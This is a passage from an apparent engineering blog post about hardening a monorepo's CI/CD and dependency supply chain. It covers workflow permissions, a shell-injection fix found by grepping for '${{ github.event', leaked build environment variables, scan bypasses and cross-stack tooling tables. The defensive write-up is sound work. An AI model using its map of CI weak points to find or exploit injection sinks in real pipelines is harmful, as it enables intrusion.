&lt;strong&gt;Day 1: Boundary 8.&lt;/strong&gt; 8 of 16 workflows ran with &lt;code&gt;permissions: write-all&lt;/code&gt;. Tightened to workflow-level &lt;code&gt;permissions: {}&lt;/code&gt; plus per-job grants. &lt;code&gt;zizmor&lt;/code&gt; added as the gate. &lt;strong&gt;First staging deploy broke&lt;/strong&gt; because &lt;code&gt;permissions: {}&lt;/code&gt; revealed an undeclared &lt;code&gt;packages: read&lt;/code&gt; that a publish job had been silently inheriting through the old &lt;code&gt;write-all&lt;/code&gt;. Caught in PR; one-line add to per-job permissions.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Day 2: Boundary 9.&lt;/strong&gt; The &lt;code&gt;opencode-review.yml:108&lt;/code&gt; CWE-78 (the lede). Four-line fix.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Day 2: Boundary 10.&lt;/strong&gt; &lt;code&gt;apps/front/remote-homepage/vite.config.ts:30&lt;/code&gt; had &lt;code&gt;'process.env': process.env,&lt;/code&gt; with a TODO comment. Every CI environment variable visible to the build host was being baked into the client bundle. Replaced with an explicit allowlist.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Day 3: Boundary 8.&lt;/strong&gt; &lt;code&gt;build-and-publish-service.yml&lt;/code&gt; lines 128 and 469: both Wiz container scan steps had &lt;code&gt;continue-on-error: true || true&lt;/code&gt;. Doubly non-blocking. Two engineers had deliberately typed those bypasses; this wasn't config drift. Removed both.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Day 3: Boundary 3.&lt;/strong&gt; Lockfile audit found one off-registry tarball: &lt;code&gt;https://cdn.sheetjs.com/xlsx-0.20.3/xlsx-0.20.3.tgz&lt;/code&gt;, in two lambda &lt;code&gt;package.json&lt;/code&gt; files. Allowlisted with rationale (SheetJS withdrew xlsx from npm in 2023).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Day 4: Boundary 12.&lt;/strong&gt; &lt;code&gt;pnpm.overrides&lt;/code&gt; audit; the lodash story below.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Day 4: Boundary 2.&lt;/strong&gt; &lt;code&gt;minimumReleaseAge&lt;/code&gt; calibration: started at 720 minutes (12 hours), tried 10080 (7 days), got blocked by a &lt;code&gt;postcss@8.5.12&lt;/code&gt; patch published four days earlier, settled at 4320 (3 days).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Day 4: Boundary 5.&lt;/strong&gt; Production Dockerfile sweep. 7 of 7 images ran as root. Added &lt;code&gt;USER node&lt;/code&gt;; switched nginx-fronted images to &lt;code&gt;nginxinc/nginx-unprivileged&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Day 5: Boundary 6.&lt;/strong&gt; Cosign keyless signing on every ECR push. Branch protection updated to require all six new gates as status checks.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;The DX cost, honestly.&lt;/strong&gt; PR-time latency went from p50 4m / p95 9m to p50 6m / p95 14m. CodeQL &lt;code&gt;security-extended&lt;/code&gt; is the long pole at ~7m. False-positive rate after the first week of tuning: zizmor ~5%, gitleaks ~2% with the project-tuned config. Two engineers asked for a &lt;code&gt;--no-verify&lt;/code&gt; escape hatch on &lt;code&gt;pinact&lt;/code&gt; early on; we declined. One pushed back hard enough that I owed him a 1:1 walking through the tj-actions chain. The friction is real and you should plan for the conversation. Fast-path bypass: a &lt;code&gt;security-bypass&lt;/code&gt; label requires CODEOWNERS approval, expires on merge, audit-logged.&lt;/p&gt;




&lt;h2&gt;
  
  
  Five lessons that don't fit in a framework
&lt;/h2&gt;

&lt;h3&gt;
  
  
  1. The "patched version" you find in an advisory is not always the version you can ship.
&lt;/h3&gt;

&lt;p&gt;Day 4. The advisory for GHSA-r5fr-rjxr-66jc (HIGH, code injection via &lt;code&gt;_.template&lt;/code&gt;) said "fixed in 4.18.0." Our &lt;code&gt;pnpm.overrides&lt;/code&gt; had &lt;code&gt;lodash-es: 4.18.0&lt;/code&gt; and &lt;code&gt;lodash: 4.18.1&lt;/code&gt;, both flagged green by the advisory.&lt;/p&gt;

&lt;p&gt;Then I checked the npm registry page. 4.18.0 was marked as a deprecated "Bad release." We were pinned to a withdrawn version, which is its own kind of supply-chain debt. The current stable was 4.17.23. The patch wasn't in it.&lt;/p&gt;

&lt;p&gt;I kept the terminal open and ran:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-rE&lt;/span&gt; &lt;span class="s1"&gt;'_\.template\('&lt;/span&gt; apps/ libs/
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Nothing. Across multiple projects, no production source called &lt;code&gt;_.template&lt;/code&gt;. The vulnerable code path was unreachable.&lt;/p&gt;

&lt;p&gt;That grep is a hand-rolled approximation of &lt;strong&gt;reachability analysis&lt;/strong&gt;, the formal name for "is the vulnerable function actually called from your code?" Tools that automate it: Endor Labs, Snyk Reachability, Semgrep Supply Chain, CodeQL with &lt;code&gt;taint-tracking&lt;/code&gt; queries. Eleven seconds with grep is the cheap version of the same idea. The expensive version costs money but covers transitive call paths grep can't see.&lt;/p&gt;

&lt;p&gt;The decision crystallised: allowlist with documented rationale, three-month expiry, named follow-up to migrate off lodash entirely.&lt;/p&gt;

&lt;p&gt;Three months from now the entry expires. CI fails again. Someone re-runs the grep and decides: still unreachable, renew? Or has someone added &lt;code&gt;_.template&lt;/code&gt; to a new feature, in which case the override is no longer safe. Either way, the decision happens. That's the difference between an allowlist with an expiry and an &lt;code&gt;eslint-disable-next-line&lt;/code&gt; that lives forever.&lt;/p&gt;

&lt;h3&gt;
  
  
  2. Aggressive controls block legitimate fixes. Calibrate, don't posture.
&lt;/h3&gt;

&lt;p&gt;Started at &lt;code&gt;minimumReleaseAge: 10080&lt;/code&gt; (7 days, pnpm's recommended baseline). Within the hour it blocked &lt;code&gt;postcss@8.5.12&lt;/code&gt;, a CVE patch published four days earlier. Dropped to 3 days.&lt;/p&gt;

&lt;p&gt;The "right" number depends on your workload. A healthcare-staffing platform tolerates 72 hours of CVE-patch latency more easily than fintech tolerates 12. Write down why you picked the number. Three days catches the noisy fast attacks (axios, ua-parser-js, @solana/web3.js were all yanked in &amp;lt;5 hours). It does not catch the patient ones (xz-utils ran 2 years; Shai-Hulud's worm re-publishes from already-trusted maintainer accounts can outlast any cooldown). &lt;code&gt;minimumReleaseAge&lt;/code&gt; is a layer, not the wall.&lt;/p&gt;

&lt;h3&gt;
  
  
  3. Detection without enforcement is not security.
&lt;/h3&gt;

&lt;p&gt;The week started with the Slack message above. The most striking finding: every right primitive was already there: Wiz, SonarCloud, Renovate, gitleaks, custom rules. None of them were blocking merges. Wiz container scans were running with &lt;code&gt;continue-on-error: true || true&lt;/code&gt;. SonarCloud ran post-merge. Pre-commit gitleaks could be skipped with &lt;code&gt;--no-verify&lt;/code&gt;. Renovate filed PRs nobody was required to merge.&lt;/p&gt;

&lt;p&gt;Moving those gates into PR-time required-status-checks (same tools, same configurations, just &lt;code&gt;required: true&lt;/code&gt; in branch protection) was, in my judgment, the largest delta in actual risk reduction over the week. It's a judgment, not a measurement; we don't have a counterfactual. Take it as senior intuition.&lt;/p&gt;

&lt;h3&gt;
  
  
  4. The blast radius of a CI compromise is usually larger than any application bug.
&lt;/h3&gt;

&lt;p&gt;An app bug leaks data. A CI compromise leaks everything that has ever run through CI: AWS credentials, deploy keys, npm tokens, signing keys, source code, SBOMs, any customer-data backup that happened to touch a build step. Treat CI/CD like production, because it has the same blast radius.&lt;/p&gt;

&lt;h3&gt;
  
  
  5. These controls assume a clean threat model. Both halves of that assumption fail.
&lt;/h3&gt;

&lt;p&gt;Most of the controls above assume the attacker is outside your org and your developers' laptops are clean. Both fail in roughly half the supply-chain incidents I've seen written up. xz-utils is the canonical maintainer-side case: a multi-year insider with valid signed commits. Every Phase 1 control passes. A compromised developer endpoint with a valid signed-commit identity bypasses CODEOWNERS, branch protection, and most of Phase 1. Endpoint posture and maintainer-identity verification are their own conversations. When you decide what to ship next, factor them in.&lt;/p&gt;




&lt;h2&gt;
  
  
  Process and culture
&lt;/h2&gt;

&lt;p&gt;Tools alone don't get you there. The process around them ends up doing more of the work than I'd expected. Three patterns that bound everything else:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;CODEOWNERS on every supply-chain surface.&lt;/strong&gt; Required reviewer on every workflow file, Dockerfile, dependency manifest, override file, and &lt;code&gt;audit-allowlist.json&lt;/code&gt; itself. Humans catch what static analysis can't see (intent, weird ownership, deprecated-but-popular packages); machines catch the rest.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Allowlists with expiry, never silent ignores.&lt;/strong&gt; Every accepted risk has rationale, verifier, and a date when it stops being accepted. CI fails at expiry and forces a re-decision rather than letting drift accumulate.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Default-deny as engineering culture.&lt;/strong&gt; &lt;code&gt;permissions: {}&lt;/code&gt; at workflow level. Empty Dockerfile &lt;code&gt;USER&lt;/code&gt; rejected. New dependency needs CODEOWNERS approval. Off-registry tarball needs written rationale. The friction surfaces decisions that would otherwise stay implicit.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;When &lt;code&gt;zizmor&lt;/code&gt; flags a workflow, gitleaks catches a token, or an audit advisory blocks a merge, the response is "what process let this through?" not "who put it there?" The first question gets you better controls. The second one gets you quieter engineers.&lt;/p&gt;




&lt;h2&gt;
  
  
  What you can ship alone vs. what needs platform
&lt;/h2&gt;

&lt;p&gt;Half the controls above can be adopted by a single team owning a single repo. The other half need platform / security-org buy-in. The trap is adopting the team-side half without the platform-side half. You eat the friction without the protection.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;A team can ship alone:&lt;/strong&gt; SHA-pinning their own workflows. Lockfile pins. &lt;code&gt;minimumReleaseAge&lt;/code&gt; in their own pnpm/Renovate config. Logger redaction in their own service. Default-deny &lt;code&gt;permissions:&lt;/code&gt; in their own workflows. Dockerfile non-root.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Needs platform / security org:&lt;/strong&gt; CODEOWNERS gating across the org. OIDC trust-policy authoring. Branch protection on &lt;code&gt;main&lt;/code&gt;. Admission controllers verifying cosign signatures at deploy time. Log retention infrastructure. Secret rotation runbooks. Cross-repo CI runner isolation.&lt;/p&gt;

&lt;p&gt;If you're a single team and the platform-side controls don't exist yet, the highest-leverage moves are the three that would have stopped both attacks in this article cold: SHA-pin every external &lt;code&gt;uses:&lt;/code&gt;, scope every &lt;code&gt;permissions:&lt;/code&gt; block to least privilege, set &lt;code&gt;minimumReleaseAge&lt;/code&gt; to 3+ days. The first two are local edits. The third is one config line. Together they're roughly two days of work.&lt;/p&gt;




&lt;h2&gt;
  
  
  Translation table: the boundaries in your stack
&lt;/h2&gt;

&lt;p&gt;This article uses pnpm + GitHub Actions because that's where I shipped the work. The boundaries don't care about the YAML.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Boundary&lt;/th&gt;
&lt;th&gt;pnpm/JS&lt;/th&gt;
&lt;th&gt;Python&lt;/th&gt;
&lt;th&gt;Java/Maven&lt;/th&gt;
&lt;th&gt;Go&lt;/th&gt;
&lt;th&gt;Rust&lt;/th&gt;
&lt;th&gt;Ruby&lt;/th&gt;
&lt;th&gt;.NET&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;2. Pin to immutable identifier&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;package.json&lt;/code&gt; exact + &lt;code&gt;pnpm install --frozen-lockfile&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;pip-compile --generate-hashes&lt;/code&gt; + &lt;code&gt;--require-hashes&lt;/code&gt;; or &lt;code&gt;poetry install --no-update&lt;/code&gt;; or &lt;code&gt;uv sync --frozen --locked&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;mvn-dependency-lock-plugin&lt;/code&gt; + &lt;code&gt;dependencies.lock&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;go.sum&lt;/code&gt; + &lt;code&gt;GOFLAGS=-mod=readonly&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;Cargo.lock&lt;/code&gt; + &lt;code&gt;cargo --frozen --locked&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;Gemfile.lock&lt;/code&gt; + &lt;code&gt;bundle config set frozen true&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;packages.lock.json&lt;/code&gt; + &lt;code&gt;dotnet restore --locked-mode&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;2. Cooldown on fresh publishes&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;minimumReleaseAge&lt;/code&gt; (pnpm-native)&lt;/td&gt;
&lt;td&gt;Renovate &lt;code&gt;minimumReleaseAge&lt;/code&gt; (covers PyPI); commercial: Socket, Phylum&lt;/td&gt;
&lt;td&gt;Renovate (covers Maven Central)&lt;/td&gt;
&lt;td&gt;Renovate (covers Go modules) + &lt;code&gt;govulncheck&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Renovate; &lt;code&gt;cargo-deny [advisories] yanked = "deny"&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Renovate; &lt;code&gt;bundler-audit&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Renovate&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;3. Lockfile integrity&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;integrity: sha512:...&lt;/code&gt; per entry&lt;/td&gt;
&lt;td&gt;hash via &lt;code&gt;--require-hashes&lt;/code&gt;; Poetry &lt;code&gt;content-hash&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Gradle &lt;code&gt;verification-metadata.xml&lt;/code&gt;; Maven &lt;code&gt;--strict-checksums&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;go.sum&lt;/code&gt; + &lt;code&gt;sum.golang.org&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Cargo lockfile checksums (built-in)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;bundle config set verify_files true&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;dotnet trust&lt;/code&gt; for signed packages&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;4. Lifecycle script gate&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;onlyBuiltDependencies&lt;/code&gt; + &lt;code&gt;--ignore-scripts&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;&lt;code&gt;pip install --only-binary=:all:&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;audit &lt;code&gt;&amp;lt;build&amp;gt;&amp;lt;plugins&amp;gt;&lt;/code&gt; + checksum-pin them&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;cgo&lt;/code&gt; / &lt;code&gt;//go:generate&lt;/code&gt; controlled via Bazel/Nix sandbox&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;build.rs&lt;/code&gt; sandboxed via Bazel &lt;code&gt;rules_rust&lt;/code&gt; or &lt;code&gt;cargo-deny&lt;/code&gt; bans&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;bundle config force_ruby_platform true&lt;/code&gt; to skip native; or sandbox&lt;/td&gt;
&lt;td&gt;PackageReference (modern) doesn't run scripts; audit any &lt;code&gt;packages.config&lt;/code&gt; projects&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;5. Base image digest pin&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;FROM image:tag@sha256:...&lt;/code&gt; (any Dockerfile, any language)&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;6. Image signing&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;cosign + Sigstore (any registry, any image)&lt;/td&gt;
&lt;td&gt;same; PEP 740 attestations + &lt;code&gt;sigstore&lt;/code&gt; for wheels&lt;/td&gt;
&lt;td&gt;same; &lt;code&gt;sigstore-maven-plugin&lt;/code&gt; for JARs&lt;/td&gt;
&lt;td&gt;same; &lt;code&gt;slsa-github-generator/builder-go&lt;/code&gt; for SLSA&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;cargo-dist&lt;/code&gt; + Sigstore&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;dotnet nuget sign&lt;/code&gt;; NuGet signature verification&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;7. CI mutable-ref pin&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;uses: org/action@&amp;lt;sha&amp;gt;&lt;/code&gt;; &lt;code&gt;pinact&lt;/code&gt; enforce&lt;/td&gt;
&lt;td&gt;(Python doesn't have an "Actions" concept; this is CI-platform, not language)&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;8. Default-deny permissions&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;GHA &lt;code&gt;permissions: {}&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;(CI-platform; see CI table below)&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;11. Logger redaction&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;pino &lt;code&gt;redact:&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;structlog&lt;/code&gt; processors + &lt;code&gt;logging.Filter&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Logback &lt;code&gt;MaskingPatternLayout&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;zap&lt;/code&gt; custom encoder; &lt;code&gt;zerolog&lt;/code&gt; &lt;code&gt;.Strs("redacted", ...)&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;tracing&lt;/code&gt; &lt;code&gt;Layer&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;&lt;code&gt;Rails.config.filter_parameters&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Serilog &lt;code&gt;Enrichers.Sensitive&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;12. Force-pin transitive&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;pnpm.overrides&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;pip &lt;code&gt;constraints.txt&lt;/code&gt;; uv &lt;code&gt;[tool.uv] override-dependencies&lt;/code&gt;; Poetry → promote to direct&lt;/td&gt;
&lt;td&gt;Maven &lt;code&gt;&amp;lt;dependencyManagement&amp;gt;&lt;/code&gt;; Gradle &lt;code&gt;dependencySubstitution&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;replace&lt;/code&gt; directive in &lt;code&gt;go.mod&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;[patch.crates-io]&lt;/code&gt; in &lt;code&gt;Cargo.toml&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Direct &lt;code&gt;gem 'foo', '1.2.3'&lt;/code&gt; in &lt;code&gt;Gemfile&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;Directory.Packages.props&lt;/code&gt; central management&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;CI translations for Boundaries 5–9:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;&lt;/th&gt;
&lt;th&gt;GitHub Actions&lt;/th&gt;
&lt;th&gt;GitLab CI&lt;/th&gt;
&lt;th&gt;Buildkite&lt;/th&gt;
&lt;th&gt;CircleCI&lt;/th&gt;
&lt;th&gt;Jenkins&lt;/th&gt;
&lt;th&gt;AWS CodeBuild&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Mutable-ref pin (B7)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;uses: org/action@&amp;lt;sha&amp;gt;&lt;/code&gt; + &lt;code&gt;pinact&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;include: ref: &amp;lt;sha&amp;gt;&lt;/code&gt; + Renovate &lt;code&gt;gitlabci-include&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Plugin &lt;code&gt;@&amp;lt;sha&amp;gt;&lt;/code&gt; + Renovate &lt;code&gt;buildkite&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Inline orbs; or pin &lt;code&gt;orbs: foo/bar@&amp;lt;exact-version&amp;gt;&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;&lt;code&gt;@Library('foo@&amp;lt;sha&amp;gt;')&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Pre-mirrored installers + checksum verify in &lt;code&gt;pre_build&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Default-deny perms (B8)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;permissions: {}&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;id_tokens:&lt;/code&gt; per-job; protected variables&lt;/td&gt;
&lt;td&gt;Agent-queue ACLs; secrets via Vault Agent&lt;/td&gt;
&lt;td&gt;Restricted contexts&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;withCredentials&lt;/code&gt; per-step; folder-level isolation&lt;/td&gt;
&lt;td&gt;Per-project IAM role; &lt;code&gt;SECRETS_MANAGER&lt;/code&gt; vars&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;OIDC trust (B8)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;sub&lt;/code&gt;/&lt;code&gt;job_workflow_ref&lt;/code&gt; anchored&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;CI_JOB_JWT_V2&lt;/code&gt; audience-bound&lt;/td&gt;
&lt;td&gt;OIDC plugin since 2023&lt;/td&gt;
&lt;td&gt;&lt;code&gt;circleci/oidc-orb&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Workload identity / &lt;code&gt;manage-credentials-binding-plugin&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;&lt;code&gt;aws sts assume-role-with-web-identity&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Shell injection (B9)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;actionlint&lt;/code&gt; + &lt;code&gt;zizmor&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;glab ci lint&lt;/code&gt;; &lt;code&gt;semgrep p/ci&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;&lt;code&gt;buildkite-pipeline-lint&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;circleci config validate&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Pipeline Linter; &lt;code&gt;pipeline-utility-steps&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;cfn-lint&lt;/code&gt; + &lt;code&gt;checkov&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Image signing identity (B6)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;OIDC issuer &lt;code&gt;token.actions.githubusercontent.com&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;CI_JOB_JWT_V2&lt;/code&gt; issuer&lt;/td&gt;
&lt;td&gt;Buildkite OIDC issuer&lt;/td&gt;
&lt;td&gt;&lt;code&gt;oidc.circleci.com&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;OIDC via plugin or workload identity&lt;/td&gt;
&lt;td&gt;CodeBuild OIDC tokens&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Cross-cutting tools, alphabetical:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Audit (CVE in deps):&lt;/strong&gt; pnpm/npm &lt;code&gt;audit&lt;/code&gt; → &lt;code&gt;pip-audit&lt;/code&gt; (Python), &lt;code&gt;mvn dependency-check:check&lt;/code&gt; or Gradle &lt;code&gt;dependencyCheckAnalyze&lt;/code&gt; (Java), &lt;code&gt;govulncheck&lt;/code&gt; (Go, symbol-aware reachability), &lt;code&gt;cargo audit&lt;/code&gt; + &lt;code&gt;cargo-deny&lt;/code&gt; (Rust), &lt;code&gt;bundler-audit&lt;/code&gt; (Ruby), &lt;code&gt;dotnet list package --vulnerable --include-transitive&lt;/code&gt; (.NET). Cross-stack: &lt;strong&gt;OSV-Scanner&lt;/strong&gt; (Google; OSV format covers all of the above), Snyk Open Source, Wiz, Socket.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cosign:&lt;/strong&gt; ecosystem-agnostic. Works on any container image and on generic blobs.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;gitleaks:&lt;/strong&gt; stack-agnostic. Alternatives: &lt;code&gt;trufflehog&lt;/code&gt;, &lt;code&gt;detect-secrets&lt;/code&gt;, GitHub native push protection. Run several; they catch different things.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;CodeQL:&lt;/strong&gt; native multi-language (JS/TS, Python, Java, Kotlin, Go, Ruby, C#, C/C++, Swift). Alternatives: Semgrep Pro (broadest), Snyk Code, SonarCloud, Veracode.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;minimumReleaseAge&lt;/code&gt;:&lt;/strong&gt; native in pnpm. Universal via Renovate (&lt;code&gt;minimumReleaseAge&lt;/code&gt; config), covering npm, Maven, PyPI, Go, Cargo, NuGet, RubyGems, Helm, Docker, GH Actions, Terraform.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;SBOM:&lt;/strong&gt; &lt;code&gt;syft&lt;/code&gt; is stack-agnostic. Per-stack: &lt;code&gt;cyclonedx-bom&lt;/code&gt; (Python), &lt;code&gt;cyclonedx-maven-plugin&lt;/code&gt; (Java), &lt;code&gt;cyclonedx-gomod&lt;/code&gt; (Go), &lt;code&gt;cargo cyclonedx&lt;/code&gt; (Rust), &lt;code&gt;bundler-cyclonedx&lt;/code&gt; (Ruby), &lt;code&gt;dotnet CycloneDX&lt;/code&gt; (.NET). Consume with &lt;strong&gt;Dependency-Track&lt;/strong&gt;; scan with &lt;strong&gt;Trivy&lt;/strong&gt; or &lt;strong&gt;Grype&lt;/strong&gt;.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The boundary survives. The YAML changes.&lt;/p&gt;




&lt;h2&gt;
  
  
  Closing
&lt;/h2&gt;

&lt;p&gt;Last week a colleague's PR went red on &lt;code&gt;pinact --check --verify&lt;/code&gt; because they'd added &lt;code&gt;actions/checkout@v6&lt;/code&gt; instead of the SHA. Thirty seconds of annoyance. Without that gate, that line would have been one tag-rewrite away from &lt;code&gt;tj-actions&lt;/code&gt;. Repeat across 110 &lt;code&gt;uses:&lt;/code&gt; lines, 16 workflows, 7 production Dockerfiles, and one &lt;code&gt;_.template&lt;/code&gt; CVE that turned out not to matter. That's the week.&lt;/p&gt;

&lt;p&gt;The supply-chain attacker's leverage is asymmetric: one compromised maintainer, one rewritten tag, one unscanned dependency cascades into thousands of victims. The defender's leverage can be asymmetric too, but only if your controls live at the right boundary. SAST won't catch a malicious GitHub Action. A pen-test won't catch a tag rewrite. A bug bounty isn't going to surface an &lt;code&gt;_.template&lt;/code&gt; CVE buried four levels deep in a transitive dep nobody knew was there.&lt;/p&gt;

&lt;p&gt;The four-line diff at the top of this article wasn't found by SAST. It wasn't found by pen-test. It was found by a grep for &lt;code&gt;${{ github.event&lt;/code&gt; across every workflow in the monorepo, on a Tuesday, by someone who knew that string was the boundary between "code we wrote" and "code an attacker wrote for us."&lt;/p&gt;

&lt;p&gt;That grep took eleven seconds. The fix took four lines. The control that catches the next one was one commit.&lt;/p&gt;

